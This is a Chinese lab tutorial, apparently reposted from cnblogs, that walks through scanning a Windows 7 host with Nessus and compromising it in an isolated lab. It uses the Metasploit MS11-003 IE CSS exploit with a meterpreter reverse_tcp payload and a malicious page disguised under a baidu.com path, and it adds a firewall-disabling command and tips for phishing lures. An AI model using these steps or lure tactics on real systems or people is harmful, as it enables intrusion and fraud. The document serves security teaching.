當前位置:首頁 > IT技術(shù) > Windows編程 > 正文

Metasploit攻擊win7實例
2021-10-20 10:37:45

實驗思考題:

1)嘗試使用Nessus對Android設備和Cisco路由器進行掃描,并分析掃描結(jié)果?

2)查閱微軟漏洞更新信息,有哪些重大的漏洞能攻破未打任何補丁的win7系統(tǒng)?

3)思考如何設計誘騙策略來提高目標用戶點擊我們構(gòu)造的惡意網(wǎng)頁的幾率?

1:

2:MS17-010遠程溢出

MS17-010漏洞出現(xiàn)在Windows SMB v1中的內(nèi)核態(tài)函數(shù)srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉(zhuǎn)換時,在大非分頁池(Large Non-Paged Kernel Pool)上存在緩沖區(qū)溢出。
函數(shù)srv!SrvOs2FeaListToNt在將FEA list轉(zhuǎn)換成NTFEA(Windows NT FEA) list前會調(diào)用。srv!SrvOs2FeaListSizeToNt去計算轉(zhuǎn)換后的FEA lsit的大小,因計算大小錯誤,而導致緩沖區(qū)溢出。

CVE-2017-0144 EternalBlue(永恒之藍)

EternalBlue(永恒之藍)據(jù)稱是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的模塊,由于其涉及漏洞的影響廣泛性及利用穩(wěn)定性,在被公開以后為破壞性巨大的勒索蠕蟲 WannaCry所用而名噪一時。360威脅情報中心對于WannaCry的活動持續(xù)地進行著監(jiān)控,我們看到的趨勢是 WannaCry的感染量還在增加,說明作為蠕蟲主要傳播手段的EternalBlue相應的漏洞還大量存在著。但是,對于EternalBlue 這個攻擊利器本身的技術(shù)分析在公開渠道上看到的討論其實并不充分,本文嘗試通過一個較完全的分析梳理相關(guān)的細節(jié),揭示其成因和相應的利用技巧。

漏洞編號

CVE-2017-0145
CVE-2017-0146
CVE-2017-0147?
CVE-2017-0148?
CVE-2017-11780?
CVE-2019-0708?
CVE-2019-1181?
CVE-2019-1182?

3:我們可以把惡意網(wǎng)頁外觀包裝成人們平時正常使用的一些軟件。同時可以通過發(fā)送誘騙郵件,有道人們主動打開網(wǎng)頁。

預備知識

Nessus基本介紹

Nessus是一個功能強大而又易于使用的網(wǎng)絡和主機漏洞評估工具,分為免費的家庭版和付費的企業(yè)版。Nessus6.0以后采取Browser/Server模式,Server端負責進行安全檢查、具體的掃描任務,客戶端用來配置管理服務器端。服務端采用plug-in的體系,允許用戶加入執(zhí)行特定功能的插件,這插件可以進行更快速和更復雜的安全檢查。Nessus自帶大量安全檢查插件能夠滿足一般用戶的安全評估任務需要,如果有特殊需要也可以將自己開發(fā)的安全檢查插件集成到Nessus中。

和其他安全掃描工具相比,Nessus主要優(yōu)勢在于免費、擴展性強,容易使用以及能夠?qū)δ繕讼到y(tǒng)進行全面的漏洞掃描。

默認狀態(tài)下, Nessus安裝成功后會開機自啟動,用戶使用安裝時配置的賬號登陸其管理界面,添加掃描任務,根據(jù)相關(guān)需要對掃描任務的相關(guān)屬性進行詳細的配置。等掃描完成以后,會生成一份詳細的報告,報告里會將掃描結(jié)果按照危險系數(shù)高低分成高危漏洞、中危漏洞、低危漏洞三類,我們一般重點關(guān)注高危漏洞,中危漏洞利用條件會比較苛刻,低危漏洞基本沒有利用的可能。查看高危漏洞詳情,根據(jù)漏洞簡介信息使用google搜索是否存在已知的Exp和攻擊方法可以提高安全測試效率。

實驗目的

通過該實驗熟悉Nessus漏洞掃描工具的安裝和主機漏洞掃描的方法,學會利用Nessus掃描結(jié)果篩選合適的Metasploit攻擊模塊進行安全測試、攻擊。

實驗環(huán)境

圖1 實驗拓撲圖

漏洞主機:win7,IP地址:10.1.1.129

攻擊主機:Kali linux,IP地址:10.1.1.128

實驗步驟一

初步了解實驗環(huán)境及Nessus安裝(實驗步驟一操作已全部完成,實驗環(huán)境內(nèi)的操作從實驗步驟二開始)

1.查看win7漏洞主機的登錄用戶及網(wǎng)絡配置信息,從下圖2可以看出漏洞主機IP為10.1.1.129。使用命令如下:

ipconfig???查看網(wǎng)絡配置信息

?

?

2.為了更好的演示攻擊win7系統(tǒng)實例需要關(guān)閉win7系統(tǒng)的防火墻,win+R輸入cmd,運行“netsh firewall set opmode mode=disable”命令

?

?

?

?

3.查看攻擊者主機登陸用戶及網(wǎng)絡配置信息,從下圖3可以看出攻擊主機登陸用戶為root ,IP為10.1.1.128

whoami????查看當前登陸用戶

ifconfig????查看網(wǎng)絡配置信息

?

?

?

4.在Nessus官網(wǎng)下載頁面選擇適合Kali linux的安裝程序。經(jīng)實驗證明多個版本的都可以在kali linux上安裝成功,這里選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程序。下載之后,拷貝到Kali linux主機上,運行下列命令進行安裝:

dpkg -i Nessus-8.9.1-debian6_amd64.deb 安裝Debian安裝包

新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

?

新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

?

配置掃描信息,主要設置掃描名稱、描述和掃描目標三個信息即可,其他配置選擇默認,配置完成點擊Save。選擇對整個10.1.1.0/24網(wǎng)段進行掃描,如下圖所示。

?

?

掃描結(jié)束后,Nessus會很直觀的顯示出目標網(wǎng)段的安全情況。下圖顯示了整個網(wǎng)段的安全信息。Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關(guān)痛癢的信息顯示問題。

?

?

?

10.1.1.129主機漏洞概況

選中高危漏洞,Nessus給出了該漏洞的介紹、風險信息、解決方案等詳細信息。Risk information對于攻擊者來說非常有用,可以根據(jù)Risk information去Google搜索是否存在已知的漏洞利用Exp。

?

?

MS11-030漏洞詳情

?

?

?

實驗步驟三

利用MS11_003 IE漏洞攻擊win7主機

步驟二中掃描得到win7主機系統(tǒng)存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點擊我們精心構(gòu)造的含有攻擊代碼的網(wǎng)頁來實現(xiàn)系統(tǒng)入侵。

1.在kali中執(zhí)行“msfconsole”,啟動metasploit

?

?2.運行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP

檢查是否存在該漏洞

?

?3.運行命令:show options,查看配置選項

?

?

?

?

4.設置生成的惡意網(wǎng)頁的URI為baidu.com

運行命令:set URIPATH baidu.com

?

5.為防止服務器端口沖突,設置服務器端口為8060,避開常用端口8080

?

運行命令:set SRVPORT 8060

?

6.設置攻擊負載

運行命令:set PAYLOAD windows/meterpreter/reverse_tcp

?

?查看還需要設置那些內(nèi)容

?

8.設置LHOST以綁定本地IP

set LHOST 10.1.1.128

?

9.為避免沖突設置LPORT

?

運行命令:set LPORT 8866

10.運行命令“exploit”開始進行攻擊,生成惡意網(wǎng)頁和做好其他準備,只等受害者訪問我們構(gòu)造的惡意網(wǎng)頁

?

?

?

11.在 Win7靶機打開IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點擊網(wǎng)頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示信息表明攻擊成功。

?

?

?

?

?

?

12.驗證攻擊是否成功。列出當前成功建立的回話,任意進入一個回話,查看攻擊者的身份??梢試L試使用getsystem進行進一步的提權(quán),如果提權(quán)失敗則可以采取上傳提權(quán)exe程序進行提權(quán)的方案獲得最高權(quán)限。

sessions???列出所有會話

sessions -i 1???進入1號會話

getuid???查看當前用戶

?

?

?

?

?

本文摘自 :https://www.cnblogs.com/

開通會員,享受整站包年服務立即開通 >